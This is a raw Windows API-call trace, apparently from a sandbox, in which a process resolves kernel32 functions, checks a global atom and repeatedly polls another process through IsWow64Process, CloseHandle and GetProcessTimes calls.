	[0131.249] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0131.249] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0131.250] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0131.250] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0131.250] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0131.250] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0131.250] CloseHandle (hObject=0x2dc) returned 1
	[0131.250] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0131.250] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.250] CloseHandle (hObject=0x2dc) returned 1
	[0131.250] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.250] CloseHandle (hObject=0x2dc) returned 1
	[0131.251] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.251] CloseHandle (hObject=0x2dc) returned 1
	[0131.251] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.251] CloseHandle (hObject=0x2dc) returned 1
	[0131.251] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.251] CloseHandle (hObject=0x2dc) returned 1
	[0131.284] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.284] CloseHandle (hObject=0x2dc) returned 1
	[0131.284] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.284] CloseHandle (hObject=0x2dc) returned 1
	[0131.285] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.285] CloseHandle (hObject=0x2dc) returned 1
	[0131.285] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.285] CloseHandle (hObject=0x2dc) returned 1
	[0131.285] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.285] CloseHandle (hObject=0x2dc) returned 1
	[0131.285] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.285] CloseHandle (hObject=0x2dc) returned 1
	[0131.286] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.286] CloseHandle (hObject=0x2dc) returned 1
	[0131.286] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.286] CloseHandle (hObject=0x2dc) returned 1
	[0131.286] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.286] CloseHandle (hObject=0x2dc) returned 1
	[0131.286] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.286] CloseHandle (hObject=0x2dc) returned 1
	[0131.286] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.286] CloseHandle (hObject=0x2dc) returned 1
	[0131.287] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.287] CloseHandle (hObject=0x2dc) returned 1
	[0131.287] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.287] CloseHandle (hObject=0x2dc) returned 1
	[0131.287] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.287] CloseHandle (hObject=0x2dc) returned 1
	[0131.287] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.287] CloseHandle (hObject=0x2dc) returned 1
	[0131.288] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.288] CloseHandle (hObject=0x2dc) returned 1
	[0131.288] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.288] CloseHandle (hObject=0x2dc) returned 1
	[0131.288] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.288] CloseHandle (hObject=0x2dc) returned 1
	[0131.288] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.288] CloseHandle (hObject=0x2dc) returned 1
	[0131.288] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.288] CloseHandle (hObject=0x2dc) returned 1
	[0131.289] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.289] CloseHandle (hObject=0x2dc) returned 1
	[0131.289] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.289] CloseHandle (hObject=0x2dc) returned 1
	[0131.289] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.289] CloseHandle (hObject=0x2dc) returned 1
	[0131.289] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.289] CloseHandle (hObject=0x2dc) returned 1
	[0131.290] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.290] CloseHandle (hObject=0x2dc) returned 1
	[0131.290] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.290] CloseHandle (hObject=0x2dc) returned 1
	[0131.290] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.290] CloseHandle (hObject=0x2dc) returned 1
	[0131.290] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.290] CloseHandle (hObject=0x2dc) returned 1
	[0131.291] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.291] CloseHandle (hObject=0x2dc) returned 1
	[0131.291] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.291] CloseHandle (hObject=0x2dc) returned 1
	[0131.291] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0131.291] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0131.291] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0131.292] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0131.292] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0131.292] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0131.292] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0131.292] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0131.292] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0131.293] CloseHandle (hObject=0x2dc) returned 1
	[0131.293] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0131.293] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.293] CloseHandle (hObject=0x2dc) returned 1
	[0131.293] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.293] CloseHandle (hObject=0x2dc) returned 1
	[0131.293] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.293] CloseHandle (hObject=0x2dc) returned 1
	[0131.294] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.294] CloseHandle (hObject=0x2dc) returned 1
	[0131.294] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.294] CloseHandle (hObject=0x2dc) returned 1
	[0131.327] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.327] CloseHandle (hObject=0x2dc) returned 1
	[0131.328] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.328] CloseHandle (hObject=0x2dc) returned 1
	[0131.328] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.328] CloseHandle (hObject=0x2dc) returned 1
	[0131.328] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.328] CloseHandle (hObject=0x2dc) returned 1
	[0131.328] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.328] CloseHandle (hObject=0x2dc) returned 1
	[0131.328] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.328] CloseHandle (hObject=0x2dc) returned 1
	[0131.329] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.329] CloseHandle (hObject=0x2dc) returned 1
	[0131.329] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.329] CloseHandle (hObject=0x2dc) returned 1
	[0131.329] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.336] CloseHandle (hObject=0x2dc) returned 1
	[0131.336] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.336] CloseHandle (hObject=0x2dc) returned 1
	[0131.337] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.337] CloseHandle (hObject=0x2dc) returned 1
	[0131.337] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.337] CloseHandle (hObject=0x2dc) returned 1
	[0131.337] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.337] CloseHandle (hObject=0x2dc) returned 1
	[0131.337] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.337] CloseHandle (hObject=0x2dc) returned 1
	[0131.337] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.338] CloseHandle (hObject=0x2dc) returned 1
	[0131.338] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.338] CloseHandle (hObject=0x2dc) returned 1
	[0131.338] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.338] CloseHandle (hObject=0x2dc) returned 1
	[0131.338] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.338] CloseHandle (hObject=0x2dc) returned 1
	[0131.339] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.339] CloseHandle (hObject=0x2dc) returned 1
	[0131.339] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.339] CloseHandle (hObject=0x2dc) returned 1
	[0131.339] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.339] CloseHandle (hObject=0x2dc) returned 1
	[0131.339] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.339] CloseHandle (hObject=0x2dc) returned 1
	[0131.339] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.340] CloseHandle (hObject=0x2dc) returned 1
	[0131.340] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.340] CloseHandle (hObject=0x2dc) returned 1
	[0131.340] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.340] CloseHandle (hObject=0x2dc) returned 1
	[0131.340] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.340] CloseHandle (hObject=0x2dc) returned 1
	[0131.340] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.340] CloseHandle (hObject=0x2dc) returned 1
	[0131.341] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.341] CloseHandle (hObject=0x2dc) returned 1
	[0131.341] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.341] CloseHandle (hObject=0x2dc) returned 1
	[0131.341] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.341] CloseHandle (hObject=0x2dc) returned 1
	[0131.342] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0131.342] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0131.342] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0131.342] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0131.343] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0131.343] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0131.343] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0131.343] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0131.343] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0131.343] CloseHandle (hObject=0x2dc) returned 1
	[0131.344] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0131.344] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.344] CloseHandle (hObject=0x2dc) returned 1
	[0131.344] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.344] CloseHandle (hObject=0x2dc) returned 1
	[0131.344] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.344] CloseHandle (hObject=0x2dc) returned 1
	[0131.345] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.345] CloseHandle (hObject=0x2dc) returned 1
	[0131.345] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.345] CloseHandle (hObject=0x2dc) returned 1
	[0131.380] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.380] CloseHandle (hObject=0x2dc) returned 1
	[0131.380] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.380] CloseHandle (hObject=0x2dc) returned 1
	[0131.380] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.380] CloseHandle (hObject=0x2dc) returned 1
	[0131.380] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.380] CloseHandle (hObject=0x2dc) returned 1
	[0131.381] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.381] CloseHandle (hObject=0x2dc) returned 1
	[0131.381] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.381] CloseHandle (hObject=0x2dc) returned 1
	[0131.381] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.381] CloseHandle (hObject=0x2dc) returned 1
	[0131.381] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.381] CloseHandle (hObject=0x2dc) returned 1
	[0131.382] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.382] CloseHandle (hObject=0x2dc) returned 1
	[0131.382] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.382] CloseHandle (hObject=0x2dc) returned 1
	[0131.382] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.382] CloseHandle (hObject=0x2dc) returned 1
	[0131.382] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.382] CloseHandle (hObject=0x2dc) returned 1
	[0131.383] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.383] CloseHandle (hObject=0x2dc) returned 1
	[0131.383] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.383] CloseHandle (hObject=0x2dc) returned 1
	[0131.383] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.383] CloseHandle (hObject=0x2dc) returned 1
	[0131.383] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.383] CloseHandle (hObject=0x2dc) returned 1
	[0131.384] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.384] CloseHandle (hObject=0x2dc) returned 1
	[0131.384] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.384] CloseHandle (hObject=0x2dc) returned 1
	[0131.384] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.384] CloseHandle (hObject=0x2dc) returned 1
	[0131.384] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.384] CloseHandle (hObject=0x2dc) returned 1
	[0131.384] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.384] CloseHandle (hObject=0x2dc) returned 1
	[0131.385] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.385] CloseHandle (hObject=0x2dc) returned 1
	[0131.385] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.385] CloseHandle (hObject=0x2dc) returned 1
	[0131.385] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.385] CloseHandle (hObject=0x2dc) returned 1
	[0131.385] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.385] CloseHandle (hObject=0x2dc) returned 1
	[0131.386] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.386] CloseHandle (hObject=0x2dc) returned 1
	[0131.386] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.386] CloseHandle (hObject=0x2dc) returned 1
	[0131.386] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.386] CloseHandle (hObject=0x2dc) returned 1
	[0131.386] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.386] CloseHandle (hObject=0x2dc) returned 1
	[0131.387] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.387] CloseHandle (hObject=0x2dc) returned 1
	[0131.387] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0131.387] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0131.387] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0131.388] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0131.388] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0131.388] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0131.388] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0131.388] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0131.388] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0131.389] CloseHandle (hObject=0x2dc) returned 1
	[0131.389] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0131.389] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.389] CloseHandle (hObject=0x2dc) returned 1
	[0131.389] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.389] CloseHandle (hObject=0x2dc) returned 1
	[0131.389] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.389] CloseHandle (hObject=0x2dc) returned 1
	[0131.390] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.390] CloseHandle (hObject=0x2dc) returned 1
	[0131.390] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.390] CloseHandle (hObject=0x2dc) returned 1
	[0131.423] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.423] CloseHandle (hObject=0x2dc) returned 1
	[0131.423] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.423] CloseHandle (hObject=0x2dc) returned 1
	[0131.424] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.424] CloseHandle (hObject=0x2dc) returned 1
	[0131.424] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.424] CloseHandle (hObject=0x2dc) returned 1
	[0131.424] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.424] CloseHandle (hObject=0x2dc) returned 1
	[0131.424] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.424] CloseHandle (hObject=0x2dc) returned 1
	[0131.425] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.425] CloseHandle (hObject=0x2dc) returned 1
	[0131.425] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.425] CloseHandle (hObject=0x2dc) returned 1
	[0131.425] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.425] CloseHandle (hObject=0x2dc) returned 1
	[0131.425] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.425] CloseHandle (hObject=0x2dc) returned 1
	[0131.425] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.426] CloseHandle (hObject=0x2dc) returned 1
	[0131.426] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.426] CloseHandle (hObject=0x2dc) returned 1
	[0131.426] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.426] CloseHandle (hObject=0x2dc) returned 1
	[0131.426] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.426] CloseHandle (hObject=0x2dc) returned 1
	[0131.426] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.427] CloseHandle (hObject=0x2dc) returned 1
	[0131.427] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.427] CloseHandle (hObject=0x2dc) returned 1
	[0131.427] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.427] CloseHandle (hObject=0x2dc) returned 1
	[0131.427] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.427] CloseHandle (hObject=0x2dc) returned 1
	[0131.427] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.428] CloseHandle (hObject=0x2dc) returned 1
	[0131.428] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.428] CloseHandle (hObject=0x2dc) returned 1
	[0131.428] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.428] CloseHandle (hObject=0x2dc) returned 1
	[0131.428] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.428] CloseHandle (hObject=0x2dc) returned 1
	[0131.429] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.429] CloseHandle (hObject=0x2dc) returned 1
	[0131.429] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.429] CloseHandle (hObject=0x2dc) returned 1
	[0131.429] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.429] CloseHandle (hObject=0x2dc) returned 1
	[0131.429] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.429] CloseHandle (hObject=0x2dc) returned 1
	[0131.430] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.430] CloseHandle (hObject=0x2dc) returned 1
	[0131.430] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
